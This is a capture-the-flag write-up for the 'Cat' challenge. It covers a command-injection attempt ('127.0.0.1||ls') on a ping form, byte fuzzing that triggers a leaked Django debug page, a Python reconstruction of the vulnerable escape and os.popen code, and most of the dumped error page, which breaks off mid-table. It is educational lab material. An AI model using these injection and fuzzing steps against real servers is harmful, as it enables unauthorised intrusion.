攻防世界 - Cat

Challenge

Open the challenge environment.

Enter the IP 127.0.0.1: the page runs a ping command against whatever you submit.

As expected, an input that ends up on a ping command line is a candidate for command injection. After a few attempts nothing executes, though, so there is probably some filtering. The first thing tried:

127.0.0.1||ls

 

Looking at the request, the url parameter is URL-encoded, so we try encoded input. In URL encoding the ASCII range ends at %7F; fuzzing the bytes above it shows that url=%FF triggers an error page that dumps a huge chunk of code, so the only option left is to audit it. The dump itself explains the trigger: Django decodes the form value as UTF-8 with replacement, so the lone 0xFF byte becomes U+FFFD; the application's escape() then calls .encode('gbk') on it, and GBK has no mapping for U+FFFD. The resulting UnicodeEncodeError, with DEBUG still on, renders Django's technical 500 page complete with source context and local variables, which is the real information leak here.
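The chain behind the %FF finding, as an added example that is not part of the writeup or the challenge source: a Python 3 reconstruction of the request path the debug page below exposes. The `escape()` logic and the whitelist regex are taken from the traceback (the original is Python 2.7 / Django 1.10); `decode_form_value`, `ping_view`, `classify` and `fuzz_single_bytes` are my own names, and the UTF-8 decode with `errors='replace'` is assumed from the dump showing `data = u'\ufffd'` for a single 0xFF byte.

```python
# Added example: reconstruction of the vulnerable request path (Python 3).
# escape() and WHITELIST mirror the code shown in the Django traceback;
# the rest is scaffolding to exercise them offline.
import re
from urllib.parse import unquote_to_bytes

SHELL_SPECIAL = ('\\', "'", '"', '$', '`')
WHITELIST = re.compile(r'^[a-zA-Z0-9\-\./]+$')


def decode_form_value(raw: bytes) -> str:
    """Django's QueryDict decodes form bytes as UTF-8 with errors='replace'
    (assumption, consistent with data == u'\\ufffd' in the dump), so an
    invalid byte becomes U+FFFD instead of raising."""
    return raw.decode('utf-8', errors='replace')


def escape(data: str) -> bytes:
    """Same logic as /opt/api/dnsapi/utils.py escape(): backslash-escape
    five shell metacharacters, then encode the result as GBK."""
    r = ''
    for c in data:
        if c in SHELL_SPECIAL:
            r = r + '\\' + c
        else:
            r = r + c
    return r.encode('gbk')   # raises UnicodeEncodeError on U+FFFD


def ping_view(url_param: bytes) -> str:
    """Mirror of dnsapi.views.ping: decode, escape, whitelist, build command.
    Returns the string os.popen() would have received, or 'Invalid URL',
    or lets the encoding error propagate exactly as Django did."""
    data = escape(decode_form_value(url_param)).decode('gbk')
    if not WHITELIST.match(data):
        return 'Invalid URL'
    return 'ping -c 1 "%s"' % data


def classify(url_param: bytes) -> str:
    """Outcome for one raw value of the `url` field: 'command', 'filtered'
    or 'unicode-error' (the Django 500 page when DEBUG=True)."""
    try:
        result = ping_view(url_param)
    except UnicodeEncodeError:
        return 'unicode-error'
    return 'filtered' if result == 'Invalid URL' else 'command'


def fuzz_single_bytes() -> dict:
    """Send every single byte %00..%FF as the url value, as the writeup's
    fuzz did, and group the bytes by outcome."""
    outcomes = {'command': [], 'filtered': [], 'unicode-error': []}
    for b in range(256):
        outcomes[classify(bytes([b]))].append(b)
    return outcomes


if __name__ == '__main__':
    print(classify(b'127.0.0.1'))                       # command
    print(classify(unquote_to_bytes('127.0.0.1||ls')))  # filtered by the regex
    print(classify(unquote_to_bytes('%7F')))            # filtered, still ASCII
    print(classify(unquote_to_bytes('%FF')))            # unicode-error
    f = fuzz_single_bytes()
    print(len(f['unicode-error']), 'bytes trigger the debug page:',
          hex(min(f['unicode-error'])), '..', hex(max(f['unicode-error'])))
```

Every byte from 0x80 upward is invalid on its own as UTF-8, so the whole upper half produces the error page, not just %FF; %7F survives because GBK is ASCII-compatible, and the `||ls` payload never reaches the shell because the whitelist rejects `|`.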


<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="robots" content="NONE,NOARCHIVE">
  <title>UnicodeEncodeError at /api/ping</title>
</head>
<body>
<div id="summary">
  <h1>UnicodeEncodeError at /api/ping</h1>
  <pre class="exception_value">&#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence</pre>
  <table class="meta">

    <tr>
      <th>Request Method:</th>
      <td>POST</td>
    </tr>
    <tr>
      <th>Request URL:</th>
      <td>http://127.0.0.1:8000/api/ping</td>
    </tr>

    <tr>
      <th>Django Version:</th>
      <td>1.10.4</td>
    </tr>

    <tr>
      <th>Exception Type:</th>
      <td>UnicodeEncodeError</td>
    </tr>


    <tr>
      <th>Exception Value:</th>
      <td><pre>&#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence</pre></td>
    </tr>


    <tr>
      <th>Exception Location:</th>
      <td>/opt/api/dnsapi/utils.py in escape, line 9</td>
    </tr>

    <tr>
      <th>Python Executable:</th>
      <td>/usr/bin/python</td>
    </tr>
    <tr>
      <th>Python Version:</th>
      <td>2.7.12</td>
    </tr>
    <tr>
      <th>Python Path:</th>
      <td><pre>[&#39;/opt/api&#39;,
 &#39;/usr/lib/python2.7&#39;,
 &#39;/usr/lib/python2.7/plat-x86_64-linux-gnu&#39;,
 &#39;/usr/lib/python2.7/lib-tk&#39;,
 &#39;/usr/lib/python2.7/lib-old&#39;,
 &#39;/usr/lib/python2.7/lib-dynload&#39;,
 &#39;/usr/local/lib/python2.7/dist-packages&#39;,
 &#39;/usr/lib/python2.7/dist-packages&#39;]</pre></td>
    </tr>
    <tr>
      <th>Server time:</th>
      <td>Wed, 18 Jan 2023 02:04:16 +0000</td>
    </tr>
  </table>
</div>

<div id="unicode-hint">
    <h2>Unicode error hint</h2>
    <p>The string that could not be encoded/decoded was: <strong>�</strong></p>
</div>




<div id="traceback">
  <h2>Traceback <span class="commands"><a href="#" onclick="return switchPastebinFriendly(this);">
    Switch to copy-and-paste view</a></span>
  </h2>
  
  <div id="browserTraceback">
    <ul class="traceback">
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/exception.py</code> in <code>inner</code>

          
            <div class="context" id="c140460418746128">
              
                <ol start="32" class="pre-context" id="pre140460418746128">
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    This decorator is automatically applied to all middleware to ensure that</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    no middleware leaks an exception and that the next middleware in the stack</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    can rely on getting a response instead of an exception.</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    &quot;&quot;&quot;</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    @wraps(get_response, assigned=available_attrs(get_response))</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    def inner(request):</pre></li>
                
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        try:</pre></li>
                
                </ol>
              
              <ol start="39" class="context-line">
                <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>
            response = get_response(request)</pre> <span>...</span></li></ol>
              
                <ol start='40' class="post-context" id="post140460418746128">
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        except Exception as exc:</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>            response = response_for_exception(request, exc)</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>        return response</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre>    return inner</pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460418746128', 'post140460418746128')"><pre></pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460418746128')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460418746128">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>exc</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>get_response</td>
                    <td class="code"><pre>&lt;bound method WSGIHandler._get_response of &lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>

          
            <div class="context" id="c140460419311880">
              
                <ol start="180" class="pre-context" id="pre140460419311880">
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                break</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        if response is None:</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            wrapped_callback = self.make_view_atomic(callback)</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            try:</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre></li>
                
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            except Exception as e:</pre></li>
                
                </ol>
              
              <ol start="187" class="context-line">
                <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>
                response = self.process_exception_by_middleware(e, request)</pre> <span>...</span></li></ol>
              
                <ol start='188' class="post-context" id="post140460419311880">
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        # Complain if the view returned None (a common error).</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>        if response is None:</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            if isinstance(callback, types.FunctionType):    # FBV</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>                view_name = callback.__name__</pre></li>
                  
                  <li onclick="toggle('pre140460419311880', 'post140460419311880')"><pre>            else:                                           # CBV</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460419311880')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460419311880">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_args</td>
                    <td class="code"><pre>()</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>e</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver</td>
                    <td class="code"><pre>&lt;RegexURLResolver &#39;api.urls&#39; (None:None) ^/&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver_match</td>
                    <td class="code"><pre>ResolverMatch(func=dnsapi.views.ping, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[])</pre></td>
                  </tr>
                
                  <tr>
                    <td>response</td>
                    <td class="code"><pre>None</pre></td>
                  </tr>
                
                  <tr>
                    <td>self</td>
                    <td class="code"><pre>&lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>wrapped_callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame django">
          <code>/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code>

          
            <div class="context" id="c140460402700232">
              
                <ol start="178" class="pre-context" id="pre140460402700232">
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            response = middleware_method(request, callback, callback_args, callback_kwargs)</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            if response:</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>                break</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        if response is None:</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            wrapped_callback = self.make_view_atomic(callback)</pre></li>
                
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            try:</pre></li>
                
                </ol>
              
              <ol start="185" class="context-line">
                <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>
                response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre> <span>...</span></li></ol>
              
                <ol start='186' class="post-context" id="post140460402700232">
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            except Exception as e:</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>                response = self.process_exception_by_middleware(e, request)</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        # Complain if the view returned None (a common error).</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>        if response is None:</pre></li>
                  
                  <li onclick="toggle('pre140460402700232', 'post140460402700232')"><pre>            if isinstance(callback, types.FunctionType):    # FBV</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402700232')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402700232">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_args</td>
                    <td class="code"><pre>()</pre></td>
                  </tr>
                
                  <tr>
                    <td>callback_kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>e</td>
                    <td class="code"><pre>UnicodeEncodeError(&#39;gbk&#39;, u&#39;\ufffd&#39;, 0, 1, &#39;illegal multibyte sequence&#39;)</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver</td>
                    <td class="code"><pre>&lt;RegexURLResolver &#39;api.urls&#39; (None:None) ^/&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>resolver_match</td>
                    <td class="code"><pre>ResolverMatch(func=dnsapi.views.ping, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[])</pre></td>
                  </tr>
                
                  <tr>
                    <td>response</td>
                    <td class="code"><pre>None</pre></td>
                  </tr>
                
                  <tr>
                    <td>self</td>
                    <td class="code"><pre>&lt;django.core.handlers.wsgi.WSGIHandler object at 0x7fbf7e66eb10&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>wrapped_callback</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677d70&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/views.py</code> in <code>wrapper</code>

          
            <div class="context" id="c140460402699440">
              
                <ol start="14" class="pre-context" id="pre140460402699440">
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        # merge requests.FILES and requests.POST</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        for k, v in request.FILES.items():</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>            if isinstance(v, InMemoryUploadedFile):</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>                v = v.read()</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>            request.FILES[k] = v</pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>        request.POST.update(request.FILES)</pre></li>
                
                </ol>
              
              <ol start="21" class="context-line">
                <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>
        return f(*args, **kwargs)</pre> <span>...</span></li></ol>
              
                <ol start='22' class="post-context" id="post140460402699440">
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>    return wrapper</pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>@process_request</pre></li>
                  
                  <li onclick="toggle('pre140460402699440', 'post140460402699440')"><pre>def ping(request):</pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402699440')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402699440">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>args</td>
                    <td class="code"><pre>(&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;,)</pre></td>
                  </tr>
                
                  <tr>
                    <td>f</td>
                    <td class="code"><pre>&lt;function ping at 0x7fbf7d677cf8&gt;</pre></td>
                  </tr>
                
                  <tr>
                    <td>kwargs</td>
                    <td class="code"><pre>{}</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/views.py</code> in <code>ping</code>

          
            <div class="context" id="c140460402697712">
              
                <ol start="23" class="pre-context" id="pre140460402697712">
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    return wrapper</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>@process_request</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>def ping(request):</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    # escape</pre></li>
                
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    data = request.POST.get(&#39;url&#39;)</pre></li>
                
                </ol>
              
              <ol start="30" class="context-line">
                <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>
    data = escape(data)</pre> <span>...</span></li></ol>
              
                <ol start='31' class="post-context" id="post140460402697712">
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    if not re.match(&#39;^[a-zA-Z0-9\-\./]+$&#39;, data):</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>        return HttpResponse(&quot;Invalid URL&quot;)</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre>    return HttpResponse(os.popen(&quot;ping -c 1 \&quot;%s\&quot;&quot; % data).read())</pre></li>
                  
                  <li onclick="toggle('pre140460402697712', 'post140460402697712')"><pre></pre></li>
                  
              </ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402697712')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402697712">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>data</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>request</td>
                    <td class="code"><pre>&lt;WSGIRequest: POST &#39;/api/ping&#39;&gt;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
        
        <li class="frame user">
          <code>/opt/api/dnsapi/utils.py</code> in <code>escape</code>

          
            <div class="context" id="c140460402698432">
              
                <ol start="2" class="pre-context" id="pre140460402698432">
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>    r = &#39;&#39;</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>    for i in range(len(data)):</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        c = data[i]</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        if c in (&#39;\\&#39;, &#39;\&#39;&#39;, &#39;&quot;&#39;, &#39;$&#39;, &#39;`&#39;):</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>            r = r + &#39;\\&#39; + c</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>        else:</pre></li>
                
                  <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>            r = r + c</pre></li>
                
                </ol>
              
              <ol start="9" class="context-line">
                <li onclick="toggle('pre140460402698432', 'post140460402698432')"><pre>
    return r.encode(&#39;gbk&#39;)</pre> <span>...</span></li></ol>
              
            </div>
          

          
            <div class="commands">
                
                    <a href="#" onclick="return varToggle(this, '140460402698432')"><span>&#x25b6;</span> Local vars</a>
                
            </div>
            <table class="vars" id="v140460402698432">
              <thead>
                <tr>
                  <th>Variable</th>
                  <th>Value</th>
                </tr>
              </thead>
              <tbody>
                
                  <tr>
                    <td>c</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>data</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
                  <tr>
                    <td>i</td>
                    <td class="code"><pre>0</pre></td>
                  </tr>
                
                  <tr>
                    <td>r</td>
                    <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
                  </tr>
                
              </tbody>
            </table>
          
        </li>
      
    </ul>
  </div>
  
  <form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post">

  <div id="pastebinTraceback" class="pastebin">
    <input type="hidden" name="language" value="PythonConsole">
    <input type="hidden" name="title"
      value="UnicodeEncodeError at /api/ping">
    <input type="hidden" name="source" value="Django Dpaste Agent">
    <input type="hidden" name="poster" value="Django">
    <textarea name="content" id="traceback_area" cols="140" rows="25">
Environment:


Request Method: POST
Request URL: http://127.0.0.1:8000/api/ping

Django Version: 1.10.4
Python Version: 2.7.12
Installed Applications:
[&#39;django.contrib.admin&#39;,
 &#39;django.contrib.auth&#39;,
 &#39;django.contrib.contenttypes&#39;,
 &#39;django.contrib.sessions&#39;,
 &#39;django.contrib.messages&#39;,
 &#39;django.contrib.staticfiles&#39;,
 &#39;dnsapi&#39;]
Installed Middleware:
[&#39;django.middleware.security.SecurityMiddleware&#39;,
 &#39;django.contrib.sessions.middleware.SessionMiddleware&#39;,
 &#39;django.middleware.common.CommonMiddleware&#39;,
 &#39;django.contrib.auth.middleware.AuthenticationMiddleware&#39;,
 &#39;django.contrib.messages.middleware.MessageMiddleware&#39;,
 &#39;django.middleware.clickjacking.XFrameOptionsMiddleware&#39;]



Traceback:

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/exception.py" in inner
  39.             response = get_response(request)

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py" in _get_response
  187.                 response = self.process_exception_by_middleware(e, request)

File "/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py" in _get_response
  185.                 response = wrapped_callback(request, *callback_args, **callback_kwargs)

File "/opt/api/dnsapi/views.py" in wrapper
  21.         return f(*args, **kwargs)

File "/opt/api/dnsapi/views.py" in ping
  30.     data = escape(data)

File "/opt/api/dnsapi/utils.py" in escape
  9.     return r.encode(&#39;gbk&#39;)

Exception Type: UnicodeEncodeError at /api/ping
Exception Value: &#39;gbk&#39; codec can&#39;t encode character u&#39;\ufffd&#39; in position 0: illegal multibyte sequence
</textarea>
  <br><br>
  <input type="submit" value="Share this traceback on a public website">
  </div>
</form>
</div>



<div id="requestinfo">
  <h2>Request information</h2>


  
    <h3 id="user-info">USER</h3>
    <p>AnonymousUser</p>
  

  <h3 id="get-info">GET</h3>
  
    <p>No GET data</p>
  

  <h3 id="post-info">POST</h3>
  
    <table class="req">
      <thead>
        <tr>
          <th>Variable</th>
          <th>Value</th>
        </tr>
      </thead>
      <tbody>
        
          <tr>
            <td>url</td>
            <td class="code"><pre>u&#39;\ufffd&#39;</pre></td>
          </tr>
        
      </tbody>
    </table>
  
  <h3 id="files-info">FILES</h3>
  
    <p>No FILES data</p>
  


  <h3 id="cookie-info">COOKIES</h3>
  
    <p>No cookie data</p>
  

  <h3 id="meta-info">META</h3>
  <table class="req">
    <thead>
      <tr>
        <th>Variable</th>
        <th>Value</th>
      </tr>
    </thead>
    <tbody>
      
        <tr>
          <td>CONTENT_LENGTH</td>
          <td class="code"><pre>&#39;139&#39;</pre></td>
        </tr>
      
        <tr>
          <td>CONTENT_TYPE</td>
          <td class="code"><pre>&#39;multipart/form-data; boundary=------------------------a982227d489d71a9&#39;</pre></td>
        </tr>
      
        <tr>
          <td>DJANGO_SETTINGS_MODULE</td>
          <td class="code"><pre>&#39;api.settings&#39;</pre></td>
        </tr>
      
        <tr>
          <td>GATEWAY_INTERFACE</td>
          <td class="code"><pre>&#39;CGI/1.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HOME</td>
          <td class="code"><pre>&#39;/root&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HOSTNAME</td>
          <td class="code"><pre>&#39;f84b747e65c1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_ACCEPT</td>
          <td class="code"><pre>&#39;*/*&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_EXPECT</td>
          <td class="code"><pre>&#39;100-continue&#39;</pre></td>
        </tr>
      
        <tr>
          <td>HTTP_HOST</td>
          <td class="code"><pre>&#39;127.0.0.1:8000&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PATH</td>
          <td class="code"><pre>&#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PATH_INFO</td>
          <td class="code"><pre>u&#39;/api/ping&#39;</pre></td>
        </tr>
      
        <tr>
          <td>PWD</td>
          <td class="code"><pre>&#39;/opt/api&#39;</pre></td>
        </tr>
      
        <tr>
          <td>QUERY_STRING</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REMOTE_ADDR</td>
          <td class="code"><pre>&#39;127.0.0.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REMOTE_HOST</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>REQUEST_METHOD</td>
          <td class="code"><pre>&#39;POST&#39;</pre></td>
        </tr>
      
        <tr>
          <td>RUN_MAIN</td>
          <td class="code"><pre>&#39;true&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SCRIPT_NAME</td>
          <td class="code"><pre>u&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_NAME</td>
          <td class="code"><pre>&#39;localhost&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_PORT</td>
          <td class="code"><pre>&#39;8000&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_PROTOCOL</td>
          <td class="code"><pre>&#39;HTTP/1.1&#39;</pre></td>
        </tr>
      
        <tr>
          <td>SERVER_SOFTWARE</td>
          <td class="code"><pre>&#39;WSGIServer/0.1 Python/2.7.12&#39;</pre></td>
        </tr>
      
        <tr>
          <td>TZ</td>
          <td class="code"><pre>&#39;UTC&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.errors</td>
          <td class="code"><pre>&lt;open file &#39;&lt;stderr&gt;&#39;, mode &#39;w&#39; at 0x7fbf814b41e0&gt;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.file_wrapper</td>
          <td class="code"><pre>&#39;&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.input</td>
          <td class="code"><pre>&lt;socket._fileobject object at 0x7fbf7d5e82d0&gt;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.multiprocess</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.multithread</td>
          <td class="code"><pre>True</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.run_once</td>
          <td class="code"><pre>False</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.url_scheme</td>
          <td class="code"><pre>&#39;http&#39;</pre></td>
        </tr>
      
        <tr>
          <td>wsgi.version</td>
          <td class="code"><pre>(1, 0)</pre></td>
        </tr>
      
    </tbody>
  </table>


  <h3 id="settings-info">Settings</h3>
  <h4>Using settings module <code>api.settings</code></h4>
  <table class="req">
    <thead>
      <tr>
